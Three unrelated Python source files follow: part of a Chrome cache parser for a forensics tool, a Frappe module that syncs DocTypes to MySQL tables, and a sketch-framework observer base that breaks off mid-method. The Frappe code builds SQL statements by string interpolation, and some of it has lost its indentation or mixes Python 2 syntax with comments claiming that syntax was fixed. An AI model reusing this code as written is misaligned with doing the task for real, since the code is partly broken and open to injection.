    Args:
      file_object (dfvfs.FileIO): a file-like object to read from.
      block_offset (int): block offset of the cache entry.

    Returns:
      CacheEntry: cache entry.

    Raises:
      ParseError: if the cache entry cannot be read.
    """
    entry_map = self._GetDataTypeMap('chrome_cache_entry')

    try:
      entry, _ = self._ReadStructureFromFileObject(
          file_object, block_offset, entry_map)
    except (ValueError, errors.ParseError) as exception:
      raise errors.ParseError((
          'Unable to parse cache entry at offset: 0x{0:08x} with error: '
          '{1!s}').format(block_offset, exception))

    cache_entry = CacheEntry()
    cache_entry.hash = entry.hash
    cache_entry.next = CacheAddress(entry.next_address)
    cache_entry.rankings_node = CacheAddress(entry.rankings_node_address)
    cache_entry.creation_time = entry.creation_time

    # The key is stored NUL-terminated inside a fixed-size byte array.
    key_bytes = bytes(bytearray(entry.key))
    cache_entry.key = key_bytes.partition(b'\x00')[0]

    try:
      cache_entry.original_url = cache_entry.key.decode('ascii')
    except UnicodeDecodeError as exception:
      raise errors.ParseError(
          'Unable to decode original URL in key with error: {0!s}'.format(
              exception))

    return cache_entry

  # pylint: disable=unused-argument
  def ParseFileObject(self, parser_mediator, file_object):
    """Parses a file-like object.

    Args:
      parser_mediator (ParserMediator): a parser mediator.
      file_object (dfvfs.FileIO): a file-like object to parse.

    Raises:
      ParseError: when the file cannot be parsed.
    """
    # Only the header is validated here; cache entries are read on
    # demand via ParseCacheEntry.
    self._ParseFileHeader(file_object)
class ChromeCacheEntryEventData(events.EventData):
  """Chrome Cache event data.

  Attributes:
    original_url (str): original URL.
  """

  DATA_TYPE = 'chrome:cache:entry'

  def __init__(self):
    """Initializes event data."""
    super(ChromeCacheEntryEventData, self).__init__(data_type=self.DATA_TYPE)
    # Set by ChromeCacheParser._ParseCacheEntries from the parsed entry.
    self.original_url = None
class ChromeCacheParser(interface.FileEntryParser):
  """Parses Chrome Cache files."""

  NAME = 'chrome_cache'
  DATA_FORMAT = 'Google Chrome or Chromium Cache file'

  def __init__(self):
    """Initializes a Chrome Cache files parser."""
    super(ChromeCacheParser, self).__init__()
    self._data_block_file_parser = ChromeCacheDataBlockFileParser()

  def _ParseCacheEntries(self, parser_mediator, index_table, data_block_files):
    """Parses Chrome Cache file entries.

    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      index_table (list[CacheAddress]): the cache addresses which are stored in
          the index file.
      data_block_files (dict[str: file]): look up table for the data block
          file-like object handles.
    """
    # Parse the cache entries in the data block files.
    for cache_address in index_table:
      cache_address_chain_length = 0
      while cache_address.value != 0:
        # Guard against overly long (possibly cyclic) next-entry chains.
        if cache_address_chain_length >= 64:
          parser_mediator.ProduceExtractionWarning(
              'Maximum allowed cache address chain length reached.')
          break

        data_block_file_object = data_block_files.get(
            cache_address.filename, None)
        if not data_block_file_object:
          message = 'Cache address: 0x{0:08x} missing data file.'.format(
              cache_address.value)
          parser_mediator.ProduceExtractionWarning(message)
          break

        try:
          cache_entry = self._data_block_file_parser.ParseCacheEntry(
              data_block_file_object, cache_address.block_offset)
        except (IOError, errors.ParseError) as exception:
          parser_mediator.ProduceExtractionWarning(
              'Unable to parse cache entry with error: {0!s}'.format(
                  exception))
          break

        event_data = ChromeCacheEntryEventData()
        event_data.original_url = cache_entry.original_url

        # Creation time is a WebKit timestamp (microseconds since
        # 1601-01-01 00:00:00 UTC).
        date_time = dfdatetime_webkit_time.WebKitTime(
            timestamp=cache_entry.creation_time)
        event = time_events.DateTimeValuesEvent(
            date_time, definitions.TIME_DESCRIPTION_LAST_VISITED)
        parser_mediator.ProduceEventWithEventData(event, event_data)

        # Follow the chain to the next cache entry.
        cache_address = cache_entry.next
        cache_address_chain_length += 1

  def _ParseIndexTable(
      self, parser_mediator, file_system, file_entry, index_table):
    """Parses a Chrome Cache index table.

    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      file_system (dfvfs.FileSystem): file system.
      file_entry (dfvfs.FileEntry): file entry.
      index_table (list[CacheAddress]): the cache addresses which are stored in
          the index file.
    """
    # Build a lookup table for the data block files.
    path_segments = file_system.SplitPath(file_entry.path_spec.location)

    data_block_files = {}
    for cache_address in index_table:
      if cache_address.filename not in data_block_files:
        # Remove the previous filename from the path segments list and
        # add one of the data block files.
        path_segments.pop()
        path_segments.append(cache_address.filename)

        # We need to pass only used arguments to the path specification
        # factory otherwise it will raise.
        kwargs = {}
        if file_entry.path_spec.parent:
          kwargs['parent'] = file_entry.path_spec.parent
        kwargs['location'] = file_system.JoinPath(path_segments)

        data_block_file_path_spec = path_spec_factory.Factory.NewPathSpec(
            file_entry.path_spec.TYPE_INDICATOR, **kwargs)

        try:
          data_block_file_entry = path_spec_resolver.Resolver.OpenFileEntry(
              data_block_file_path_spec)
        except RuntimeError as exception:
          message = (
              'Unable to open data block file: {0:s} with error: '
              '{1!s}'.format(kwargs['location'], exception))
          parser_mediator.ProduceExtractionWarning(message)
          data_block_file_entry = None

        if not data_block_file_entry:
          # A missing data block file is recorded as None so cache
          # entries referencing it produce a warning instead of a crash.
          message = 'Missing data block file: {0:s}'.format(
              cache_address.filename)
          parser_mediator.ProduceExtractionWarning(message)
          data_block_file_object = None

        else:
          data_block_file_object = data_block_file_entry.GetFileObject()

          try:
            self._data_block_file_parser.ParseFileObject(
                parser_mediator, data_block_file_object)
          except (IOError, errors.ParseError) as exception:
            message = (
                'Unable to parse data block file: {0:s} with error: '
                '{1!s}').format(cache_address.filename, exception)
            parser_mediator.ProduceExtractionWarning(message)
            # Close unusable handles immediately; None marks them skipped.
            data_block_file_object.close()
            data_block_file_object = None

        data_block_files[cache_address.filename] = data_block_file_object

    try:
      self._ParseCacheEntries(
          parser_mediator, index_table, data_block_files)
    finally:
      # Always release the data block file handles.
      for data_block_file_object in data_block_files.values():
        if data_block_file_object:
          data_block_file_object.close()

  def ParseFileEntry(self, parser_mediator, file_entry):
    """Parses Chrome Cache files.

    Args:
      parser_mediator (ParserMediator): mediates interactions between parsers
          and other components, such as storage and dfvfs.
      file_entry (dfvfs.FileEntry): file entry.

    Raises:
      UnableToParseFile: when the file cannot be parsed.
    """
    index_file_parser = ChromeCacheIndexFileParser()

    file_object = file_entry.GetFileObject()
    if not file_object:
      display_name = parser_mediator.GetDisplayName()
      raise errors.UnableToParseFile(
          '[{0:s}] unable to parse index file {1:s}'.format(
              self.NAME, display_name))

    try:
      index_file_parser.ParseFileObject(parser_mediator, file_object)
    except (IOError, errors.ParseError) as exception:
      file_object.close()
      display_name = parser_mediator.GetDisplayName()
      raise errors.UnableToParseFile(
          '[{0:s}] unable to parse index file {1:s} with error: {2!s}'.format(
              self.NAME, display_name, exception))

    # TODO: create event based on index file creation time.

    try:
      file_system = file_entry.GetFileSystem()
      self._ParseIndexTable(
          parser_mediator, file_system, file_entry,
          index_file_parser.index_table)
    finally:
      file_object.close()
# Register the parser with the parsers manager so it is discoverable.
manager.ParsersManager.RegisterParser(ChromeCacheParser)
| |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Syncs a database table to the `DocType` (metadata)
.. note:: This module is only used internally
"""
import re
import os
import frappe
from frappe import _
from frappe.utils import cstr, cint, flt
import MySQLdb
# Raised when a DocField fieldname is not usable as a MySQL column name.
class InvalidColumnName(frappe.ValidationError): pass
# Default length for framework varchar columns (VARCHAR(140)).
varchar_len = '140'

# Framework-managed varchar columns present in every DocType table.
standard_varchar_columns = ('name', 'owner', 'modified_by', 'parent', 'parentfield', 'parenttype')

# Maps DocField fieldtype -> (MySQL column type, length/precision spec).
type_map = {
    'Currency':     ('decimal', '18,6')
    ,'Int':         ('int', '11')
    ,'Float':       ('decimal', '18,6')
    ,'Percent':     ('decimal', '18,6')
    ,'Check':       ('int', '1')
    ,'Small Text':  ('text', '')
    ,'Long Text':   ('longtext', '')
    ,'Code':        ('longtext', '')
    ,'Text Editor': ('longtext', '')
    ,'Date':        ('date', '')
    ,'Datetime':    ('datetime', '6')
    ,'Time':        ('time', '6')
    ,'Text':        ('text', '')
    ,'Data':        ('varchar', varchar_len)
    ,'Link':        ('varchar', varchar_len)
    ,'Dynamic Link':('varchar', varchar_len)
    ,'Password':    ('varchar', varchar_len)
    ,'Select':      ('varchar', varchar_len)
    ,'Read Only':   ('varchar', varchar_len)
    ,'Attach':      ('text', '')
    ,'Attach Image':('text', '')
}

# Columns created for every table regardless of DocType fields.
default_columns = ['name', 'creation', 'modified', 'modified_by', 'owner',
    'docstatus', 'parent', 'parentfield', 'parenttype', 'idx']

# Extra columns added to non-child tables only.
optional_columns = ["_user_tags", "_comments", "_assign", "_liked_by"]

# Default values that are shortcuts resolved at runtime, never stored
# as literal column defaults.
default_shortcuts = ['_Login', '__user', '_Full Name', 'Today', '__today', "now", "Now"]
def updatedb(dt, meta=None):
    """
    Syncs a `DocType` to the table
    * creates if required
    * updates columns
    * updates indices

    :param dt: DocType name.
    :param meta: optional pre-loaded meta; fetched by DbTable if None.
    """
    res = frappe.db.sql("select issingle from tabDocType where name=%s", (dt,))
    if not res:
        raise Exception, 'Wrong doctype "%s" in updatedb' % dt

    # Single DocTypes have no table of their own; nothing to sync.
    if not res[0][0]:
        tab = DbTable(dt, 'tab', meta)
        tab.validate()

        # Commit before DDL: MySQL DDL statements implicitly commit, so
        # flush the current transaction explicitly and reopen it after.
        frappe.db.commit()
        tab.sync()
        frappe.db.begin()
class DbTable:
    """Represents the MySQL table backing a DocType and synchronizes it
    with the DocType's field metadata (create/alter columns, indexes,
    defaults)."""

    def __init__(self, doctype, prefix = 'tab', meta = None):
        self.doctype = doctype
        self.name = prefix + doctype
        self.columns = {}           # fieldname -> DbColumn (wanted state)
        self.current_columns = {}   # fieldname -> dict (actual DB state)
        self.meta = meta
        if not self.meta:
            self.meta = frappe.get_meta(self.doctype)

        # lists for change
        self.add_column = []
        self.change_type = []
        self.add_index = []
        self.drop_index = []
        self.set_default = []

        # load
        self.get_columns_from_docfields()

    def validate(self):
        """Check if change in varchar length isn't truncating the columns"""
        if self.is_new():
            return

        self.get_columns_from_db()

        columns = [frappe._dict({"fieldname": f, "fieldtype": "Data"}) for f in standard_varchar_columns]
        columns += self.columns.values()

        for col in columns:
            if col.fieldtype in type_map and type_map[col.fieldtype][0]=="varchar":

                # validate length range
                new_length = cint(col.length) or cint(varchar_len)
                if not (1 <= new_length <= 255):
                    frappe.throw(_("Length of {0} should be between 1 and 255").format(col.fieldname))

                try:
                    # check for truncation
                    max_length = frappe.db.sql("""select max(char_length(`{fieldname}`)) from `tab{doctype}`"""\
                        .format(fieldname=col.fieldname, doctype=self.doctype))
                except MySQLdb.OperationalError, e:
                    if e.args[0]==1054:
                        # Unknown column 'column_name' in 'field list':
                        # the column does not exist yet, nothing to truncate.
                        continue
                    else:
                        raise

                if max_length and max_length[0][0] > new_length:
                    current_type = self.current_columns[col.fieldname]["type"]
                    current_length = re.findall('varchar\(([\d]+)\)', current_type)
                    if not current_length:
                        # case when the field is no longer a varchar
                        continue
                    current_length = current_length[0]
                    if col.fieldname in self.columns:
                        # Revert to the existing length rather than truncate data.
                        self.columns[col.fieldname].length = current_length

                    frappe.msgprint(_("Reverting length to {0} for '{1}' in '{2}'; Setting the length as {3} will cause truncation of data.")\
                        .format(current_length, col.fieldname, self.doctype, new_length))

    def sync(self):
        # Create the table if missing, otherwise apply incremental changes.
        if self.is_new():
            self.create()
        else:
            self.alter()

    def is_new(self):
        # True when the backing table does not exist in the current database.
        return self.name not in DbManager(frappe.db).get_tables_list(frappe.db.cur_db_name)

    def create(self):
        """Create the table with framework columns plus DocType columns."""
        add_text = ''

        # columns
        column_defs = self.get_column_definitions()
        if column_defs: add_text += ',\n'.join(column_defs) + ',\n'

        # index
        index_defs = self.get_index_definitions()
        if index_defs: add_text += ',\n'.join(index_defs) + ',\n'

        # create table
        # NOTE: {varchar_len} is filled by .format, %s placeholders by the
        # subsequent % interpolation of table name and generated columns.
        frappe.db.sql("""create table `%s` (
            name varchar({varchar_len}) not null primary key,
            creation datetime(6),
            modified datetime(6),
            modified_by varchar({varchar_len}),
            owner varchar({varchar_len}),
            docstatus int(1) not null default '0',
            parent varchar({varchar_len}),
            parentfield varchar({varchar_len}),
            parenttype varchar({varchar_len}),
            idx int(8) not null default '0',
            %sindex parent(parent))
            ENGINE=InnoDB
            ROW_FORMAT=COMPRESSED
            CHARACTER SET=utf8mb4
            COLLATE=utf8mb4_unicode_ci""".format(varchar_len=varchar_len) % (self.name, add_text))

    def get_column_definitions(self):
        """Return DDL fragments for all non-framework columns."""
        column_list = [] + default_columns
        ret = []
        for k in self.columns.keys():
            if k not in column_list:
                d = self.columns[k].get_definition()
                if d:
                    ret.append('`'+ k+ '` ' + d)
                    column_list.append(k)
        return ret

    def get_index_definitions(self):
        """Return DDL index fragments for indexable (non-text) columns."""
        ret = []
        for key, col in self.columns.items():
            if col.set_index and col.fieldtype in type_map and \
                    type_map.get(col.fieldtype)[0] not in ('text', 'longtext'):
                ret.append('index `' + key + '`(`' + key + '`)')
        return ret

    def get_columns_from_docfields(self):
        """
        get columns from docfields and custom fields
        """
        fl = frappe.db.sql("SELECT * FROM tabDocField WHERE parent = %s", self.doctype, as_dict = 1)
        lengths = {}
        precisions = {}
        uniques = {}

        # optional fields like _comments
        if not self.meta.istable:
            for fieldname in optional_columns:
                fl.append({
                    "fieldname": fieldname,
                    "fieldtype": "Text"
                })

            # add _seen column if track_seen
            if getattr(self.meta, 'track_seen', False):
                fl.append({
                    'fieldname': '_seen',
                    'fieldtype': 'Text'
                })

        if not frappe.flags.in_install_db and frappe.flags.in_install != "frappe":
            custom_fl = frappe.db.sql("""\
                SELECT * FROM `tabCustom Field`
                WHERE dt = %s AND docstatus < 2""", (self.doctype,), as_dict=1)
            if custom_fl: fl += custom_fl

            # apply length, precision and unique from property setters
            for ps in frappe.get_all("Property Setter", fields=["field_name", "property", "value"],
                filters={
                    "doc_type": self.doctype,
                    "doctype_or_field": "DocField",
                    "property": ["in", ["precision", "length", "unique"]]
                }):
                if ps.property=="length":
                    lengths[ps.field_name] = cint(ps.value)
                elif ps.property=="precision":
                    precisions[ps.field_name] = cint(ps.value)
                elif ps.property=="unique":
                    uniques[ps.field_name] = cint(ps.value)

        for f in fl:
            # Property-setter overrides take precedence over DocField values.
            self.columns[f['fieldname']] = DbColumn(self, f['fieldname'],
                f['fieldtype'], lengths.get(f["fieldname"]) or f.get('length'), f.get('default'), f.get('search_index'),
                f.get('options'), uniques.get(f["fieldname"], f.get('unique')), precisions.get(f['fieldname']) or f.get('precision'))

    def get_columns_from_db(self):
        # Snapshot the live table schema via DESC.
        self.show_columns = frappe.db.sql("desc `%s`" % self.name)
        for c in self.show_columns:
            self.current_columns[c[0]] = {'name': c[0],
                'type':c[1], 'index':c[3]=="MUL", 'default':c[4], "unique":c[3]=="UNI"}

    # GET foreign keys
    def get_foreign_keys(self):
        """Return [(column, constraint_name)] parsed from SHOW CREATE TABLE."""
        fk_list = []
        txt = frappe.db.sql("show create table `%s`" % self.name)[0][1]
        for line in txt.split('\n'):
            if line.strip().startswith('CONSTRAINT') and line.find('FOREIGN')!=-1:
                try:
                    fk_list.append((line.split('`')[3], line.split('`')[1]))
                except IndexError:
                    pass

        return fk_list

    # Drop foreign keys
    def drop_foreign_keys(self):
        # NOTE(review): self.drop_foreign_key is never initialized in
        # __init__ — this raises AttributeError unless a caller sets it
        # first; confirm intended usage.
        if not self.drop_foreign_key:
            return

        fk_list = self.get_foreign_keys()

        # make dictionary of constraint names
        fk_dict = {}
        for f in fk_list:
            fk_dict[f[0]] = f[1]

        # drop
        for col in self.drop_foreign_key:
            frappe.db.sql("set foreign_key_checks=0")
            frappe.db.sql("alter table `%s` drop foreign key `%s`" % (self.name, fk_dict[col.fieldname]))
            frappe.db.sql("set foreign_key_checks=1")

    def alter(self):
        """Apply pending column/index/default changes in one ALTER TABLE."""
        for col in self.columns.values():
            col.build_for_alter_table(self.current_columns.get(col.fieldname, None))

        query = []

        for col in self.add_column:
            query.append("add column `{}` {}".format(col.fieldname, col.get_definition()))

        for col in self.change_type:
            query.append("change `{}` `{}` {}".format(col.fieldname, col.fieldname, col.get_definition()))

        for col in self.add_index:
            # if index key not exists
            if not frappe.db.sql("show index from `%s` where key_name = %s" %
                    (self.name, '%s'), col.fieldname):
                query.append("add index `{}`(`{}`)".format(col.fieldname, col.fieldname))

        for col in self.drop_index:
            if col.fieldname != 'name': # primary key
                # if index key exists
                if frappe.db.sql("""show index from `{0}`
                    where key_name=%s
                    and Non_unique=%s""".format(self.name), (col.fieldname, 1 if col.unique else 0)):
                    query.append("drop index `{}`".format(col.fieldname))

        for col in self.set_default:
            if col.fieldname=="name":
                continue

            if col.fieldtype in ("Check", "Int"):
                col_default = cint(col.default)

            elif col.fieldtype in ("Currency", "Float", "Percent"):
                col_default = flt(col.default)

            elif not col.default:
                col_default = "null"

            else:
                # Escape embedded double quotes for the SQL literal.
                col_default = '"{}"'.format(col.default.replace('"', '\\"'))

            query.append('alter column `{}` set default {}'.format(col.fieldname, col_default))

        if query:
            try:
                frappe.db.sql("alter table `{}` {}".format(self.name, ", ".join(query)))
            except Exception, e:
                # sanitize
                if e.args[0]==1060:
                    # Duplicate column name
                    frappe.throw(str(e))
                elif e.args[0]==1062:
                    # Duplicate entry: adding unique over non-unique data
                    fieldname = str(e).split("'")[-2]
                    frappe.throw(_("{0} field cannot be set as unique in {1}, as there are non-unique existing values".format(fieldname, self.name)))
                else:
                    raise e
class DbColumn:
def __init__(self, table, fieldname, fieldtype, length, default,
set_index, options, unique, precision):
self.table = table
self.fieldname = fieldname
self.fieldtype = fieldtype
self.length = length
self.set_index = set_index
self.default = default
self.options = options
self.unique = unique
self.precision = precision
def get_definition(self, with_default=1):
column_def = get_definition(self.fieldtype, precision=self.precision, length=self.length)
if not column_def:
return column_def
if self.fieldtype in ("Check", "Int"):
default_value = cint(self.default) or 0
column_def += ' not null default {0}'.format(default_value)
elif self.fieldtype in ("Currency", "Float", "Percent"):
default_value = flt(self.default) or 0
column_def += ' not null default {0}'.format(default_value)
elif self.default and (self.default not in default_shortcuts) \
and not self.default.startswith(":") and column_def not in ('text', 'longtext'):
column_def += ' default "' + self.default.replace('"', '\"') + '"'
if self.unique and (column_def not in ('text', 'longtext')):
column_def += ' unique'
return column_def
def build_for_alter_table(self, current_def):
column_def = get_definition(self.fieldtype, self.precision, self.length)
# no columns
if not column_def:
return
# to add?
if not current_def:
self.fieldname = validate_column_name(self.fieldname)
self.table.add_column.append(self)
return
# type
if (current_def['type'] != column_def) or \
((self.unique and not current_def['unique']) and column_def not in ('text', 'longtext')):
self.table.change_type.append(self)
else:
# default
if (self.default_changed(current_def) \
and (self.default not in default_shortcuts) \
and not cstr(self.default).startswith(":") \
and not (column_def in ['text','longtext'])):
self.table.set_default.append(self)
# index should be applied or dropped irrespective of type change
if ( (current_def['index'] and not self.set_index and not self.unique)
or (current_def['unique'] and not self.unique) ):
# to drop unique you have to drop index
self.table.drop_index.append(self)
elif (not current_def['index'] and self.set_index) and not (column_def in ('text', 'longtext')):
self.table.add_index.append(self)
def default_changed(self, current_def):
if "decimal" in current_def['type']:
return self.default_changed_for_decimal(current_def)
else:
return current_def['default'] != self.default
def default_changed_for_decimal(self, current_def):
    """Numeric-aware default comparison for decimal columns.

    Treats "" and None as 'no default'; otherwise compares the two
    defaults as floats. Any TypeError from float() counts as changed.
    """
    old_default = current_def['default']
    new_default = self.default
    try:
        if old_default in ("", None) and new_default in ("", None):
            # neither side has a default
            return False
        if old_default in ("", None):
            # changed only if the new default parses as a number
            try:
                float(new_default)
            except ValueError:
                return False
            return True
        if new_default in ("", None):
            # the existing default is being cleared
            return True
        # NOTE float() raise ValueError when "" or None is passed
        return float(old_default) != float(new_default)
    except TypeError:
        return True
class DbManager:
    """
    Basically, a wrapper for oft-used mysql commands. like show tables,databases, variables etc...

    #TODO:
    0.  Simplify / create settings for the restore database source folder
    0a. Merge restore database and extract_sql(from frappe_server_tools).
    1. Setter and getter for different mysql variables.
    2. Setter and getter for mysql variables at global level??

    NOTE(review): most statements here are built by %-interpolation, not
    parameterized queries. Callers must only pass trusted identifiers.
    """
    def __init__(self, db):
        """
        Pass root_conn here for access to all databases.
        """
        if db:
            self.db = db

    def get_variables(self, regex):
        """
        Get variables that match the passed pattern regex
        """
        return list(self.db.sql("SHOW VARIABLES LIKE '%s'"%regex))

    def get_table_schema(self, table):
        """
        Just returns the output of Desc tables.
        """
        return list(self.db.sql("DESC `%s`"%table))

    def get_tables_list(self, target=None):
        """get list of tables; optionally switch to database `target` first"""
        if target:
            self.db.use(target)
        return [t[0] for t in self.db.sql("SHOW TABLES")]

    def create_user(self, user, password, host):
        # Create user if it doesn't exist.
        # MySQL usernames are limited to 16 chars, hence user[:16].
        if password:
            self.db.sql("CREATE USER '%s'@'%s' IDENTIFIED BY '%s';" % (user[:16], host, password))
        else:
            self.db.sql("CREATE USER '%s'@'%s';" % (user[:16], host))

    def delete_user(self, target, host):
        # delete user if exists
        try:
            self.db.sql("DROP USER '%s'@'%s';" % (target, host))
        except Exception as e:
            # FIX: `except Exception, e` is Python-2-only syntax;
            # `as e` works on Python 2.6+ and Python 3.
            # 1396 = ER_CANNOT_USER: the user did not exist, which is fine
            if e.args[0] == 1396:
                pass
            else:
                raise

    def create_database(self, target):
        # recreate from scratch if the database already exists
        if target in self.get_database_list():
            self.drop_database(target)
        self.db.sql("CREATE DATABASE IF NOT EXISTS `%s` ;" % target)

    def drop_database(self, target):
        self.db.sql("DROP DATABASE IF EXISTS `%s`;"%target)

    def grant_all_privileges(self, target, user, host):
        self.db.sql("GRANT ALL PRIVILEGES ON `%s`.* TO '%s'@'%s';" % (target, user, host))

    def grant_select_privilges(self, db, table, user, host):
        # grant on one table when given, else on the whole database
        if table:
            self.db.sql("GRANT SELECT ON %s.%s to '%s'@'%s';" % (db, table, user, host))
        else:
            self.db.sql("GRANT SELECT ON %s.* to '%s'@'%s';" % (db, user, host))

    def flush_privileges(self):
        self.db.sql("FLUSH PRIVILEGES")

    def get_database_list(self):
        """get list of databases"""
        return [d[0] for d in self.db.sql("SHOW DATABASES")]

    def restore_database(self, target, source, user, password):
        """Restore `source` (a SQL dump file) into database `target`
        by shelling out to the mysql client."""
        from frappe.utils import make_esc
        esc = make_esc('$ ')
        os.system("mysql -u %s -p%s -h%s %s < %s" % \
            (esc(user), esc(password), esc(frappe.db.host), esc(target), source))

    def drop_table(self, table_name):
        """drop table if exists"""
        if not table_name in self.get_tables_list():
            return
        self.db.sql("DROP TABLE IF EXISTS %s "%(table_name))
def validate_column_name(n):
    """Normalise a fieldname for use as a DB column: spaces become
    underscores and the name is lower-cased. Throws InvalidColumnName
    if any non-word character remains."""
    cleaned = n.replace(' ', '_').strip().lower()
    bad_chars = re.findall("[\W]", cleaned, re.UNICODE)
    if bad_chars:
        shown = ", ".join('"{0}"'.format(ch) for ch in bad_chars)
        frappe.throw(_("Fieldname {0} cannot have special characters like {1}").format(cstr(cleaned), shown), InvalidColumnName)
    return cleaned
def remove_all_foreign_keys():
    """Drop every foreign key from all non-single DocType tables.

    Disables foreign key checks first so the drops cannot fail on
    ordering; DocTypes whose table does not exist are skipped.
    """
    frappe.db.sql("set foreign_key_checks = 0")
    frappe.db.commit()
    for t in frappe.db.sql("select name from tabDocType where issingle=0"):
        dbtab = DbTable(t[0])
        try:
            fklist = dbtab.get_foreign_keys()
        except Exception as e:
            # FIX: `except Exception, e` is Python-2-only syntax;
            # `as e` works on Python 2.6+ and Python 3.
            # 1146 = ER_NO_SUCH_TABLE: the DocType has no table yet
            if e.args[0] == 1146:
                fklist = []
            else:
                raise
        for f in fklist:
            frappe.db.sql("alter table `tab%s` drop foreign key `%s`" % (t[0], f[1]))
def get_definition(fieldtype, precision=None, length=None):
    """Map a DocField fieldtype to its MySQL column definition string
    (e.g. "varchar(140)"), or None when the fieldtype has no column."""
    entry = type_map.get(fieldtype)
    if not entry:
        return
    coltype = entry[0]
    size = entry[1] if entry[1] else None
    if size:
        # widen float-ish columns when a precision above 6 is requested
        if fieldtype in ["Float", "Currency", "Percent"] and cint(precision) > 6:
            size = '21,9'
        # honour an explicit length for varchar columns
        if coltype == "varchar" and length:
            size = length
    if size is not None:
        coltype = "{coltype}({size})".format(coltype=coltype, size=size)
    return coltype
def add_column(doctype, column_name, fieldtype, precision=None):
    """Add `column_name` to the doctype's table; no-op if it already
    exists."""
    if column_name in frappe.db.get_table_columns(doctype):
        # already exists
        return
    frappe.db.commit()
    ddl = "alter table `tab%s` add column %s %s" % (
        doctype, column_name, get_definition(fieldtype, precision))
    frappe.db.sql(ddl)
| |
"""
filename: ObserverBase.py
description:
Doctest Examples:
>>> class MyVisualizer(Visualizer):
... def drawAnno(self,anno):
... pass
...
>>> m = MyVisualizer(Annotation)
>>> class MyCollector(Collector):
... def mergeCollections(self,anno):
... pass
...
>>> class Annotation2(Annotation):
... pass
>>> m = MyCollector([Annotation],Annotation2)
"""
#-------------------------------------
import pdb
import math
import time
from Utils import Logger
from Utils import GeomUtils
from SketchFramework.Point import Point
from SketchFramework.Stroke import Stroke
from SketchFramework.Board import BoardObserver, Board
from SketchFramework.Annotation import Annotation, AnnotatableObject
logger = Logger.getLogger('ObserverBase', Logger.WARN )
#-------------------------------------
class Visualizer( BoardObserver ):
    """Board observer that tracks annotations of one type and draws them.

    Subclasses override drawAnno(); this base class keeps the list of
    live annotations in sync with the board.
    """
    def __init__(self, board, anno_type):
        BoardObserver.__init__(self, board)
        self.getBoard().AddBoardObserver( self , [])
        self.getBoard().RegisterForAnnotation( anno_type, self )
        self.annotation_list = []

    def onAnnotationAdded( self, strokes, annotation ):
        # remember the annotation so drawMyself can render it
        logger.debug("anno added %s", annotation )
        self.annotation_list.append(annotation)

    def onAnnotationRemoved(self, annotation):
        logger.debug("anno removed %s", annotation )
        try:
            self.annotation_list.remove(annotation)
        except ValueError:
            # not tracked; nothing to forget
            pass

    def drawMyself( self ):
        # delegate each tracked annotation to the subclass hook
        for tracked in self.annotation_list:
            self.drawAnno( tracked )

    def drawAnno( self, anno ):
        logger.error("failure to implement virtual method 'drawAnno'")
        raise NotImplementedError
#-------------------------------------
anim_logger = Logger.getLogger('Animator', Logger.WARN )
class Animator( Visualizer ):
    """Watches for annotations and animates them at roughly the requested
    fps. The watched annotation type must implement step(dt), where dt is
    the elapsed time in milliseconds since the previous frame."""
    CALLTIMES = {} #Maps an annotation to the last time (in ms) it was "stepped"

    def __init__(self, board, anno_type = None, fps = 1):
        anim_logger.debug("Initializing: Watch for %s" % (anno_type))
        if not hasattr(anno_type, "step"):
            anim_logger.error("%s must implement 'step'" % (anno_type.__name__))
            raise NotImplementedError
        Visualizer.__init__(self, board, anno_type)
        self.fps = fps

    def drawMyself( self ):
        "Calls each observed annotation with a step of however many ms since its last call, and then draws the anno"
        for a in self.annotation_list:
            now_ms = 1000 * time.time()
            # first-time annotations default to "now", i.e. a zero step
            lastcall = Animator.CALLTIMES.get(a, now_ms)
            anim_logger.debug("Calling %s anno %s ms later" % (a, now_ms - lastcall))
            # BUGFIX: CALLTIMES stores milliseconds, so the elapsed time
            # must also be computed in milliseconds; previously
            # `time.time() - lastcall` subtracted ms from seconds.
            a.step( now_ms - lastcall )
            anim_logger.debug("Drawing frame for %s" % (a))
            self.drawAnno( a )
            Animator.CALLTIMES[a] = 1000 * time.time()

    def drawAnno( self, anno ):
        anim_logger.error("failure to implement virtual method 'drawAnno'")
        raise NotImplementedError
#-------------------------------------
class Collector( BoardObserver ):
    "Watches for annotations, collects them together into new annotations"
    # this assumes that you have some base annotations called "items" (e.g. arrow and circle annotations)
    # and that you want to find collections of these items (e.g. directed graphs) and mark them with a big annotation
    # according to some rules (e.g. graphs must be "connected" with arrows pointing to circles).
    # It also assumes that each item is a valid collection of it's own (e.g. an circle is a graph).
    # If this is the case, you just need to implement two functions, collectionFromItem and mergeCollections.
    # collectionFromItem builds a new collection of size 1 from one of the base items (or returns None).
    # mergeCollections takes two collections and merges them into one if possible.
    # If this collector adds annotations other than the collection_annotype, list them in other_target_annos
    def __init__(self, board, item_annotype_list, collection_annotype, other_target_annos = []):
        # NOTE(review): `other_target_annos` has a mutable default and is
        # never read in this method -- presumably consumed elsewhere or
        # kept for API compatibility; confirm before relying on it.
        BoardObserver.__init__(self, board)
        self.getBoard().AddBoardObserver( self , [collection_annotype])
        # listen for both the item types and the collection type itself
        for annotype in item_annotype_list:
            self.getBoard().RegisterForAnnotation( annotype, self )
        self.getBoard().RegisterForAnnotation( collection_annotype, self )
        self.all_collections = set([])
        self.item_annotype_list = item_annotype_list # types of the "items" (e.g. CircleAnnotation, ArrowAnnotation)
        self.collection_annotype = collection_annotype # type of the "collection" (e.g. DiGraphAnnotation)

    def onAnnotationAdded( self, strokes, annotation ):
        # A collection annotation is tracked directly; an item annotation
        # is promoted to a size-1 collection via collectionFromItem, then
        # all collections are re-merged.
        if type(annotation) is self.collection_annotype:
            self.all_collections.add(annotation)
        else:
            for annotype in self.item_annotype_list:
                if annotation.isType( annotype ):
                    collection = self.collectionFromItem( strokes, annotation )
                    if collection is not None:
                        self.all_collections.add( collection )
                        self.getBoard().AnnotateStrokes( strokes, collection )
        self._merge_all_collections()

    def onAnnotationRemoved( self, annotation ):
        """Unique to collections, removing an annotation that was used to build a collection
        results in every dependent collection being removed and rebuilt from scratch.
        ** Ordering is NOT necessarily preserved! **"""
        if( annotation in self.all_collections ):
            self.all_collections.remove( annotation )
        if type(annotation) in self.item_annotype_list:
            logger.debug("Removing collection item: rebuilding collections")
            all_item_annos = set([])
            all_collection_annos = set([])
            # find every collection whose strokes touch this annotation
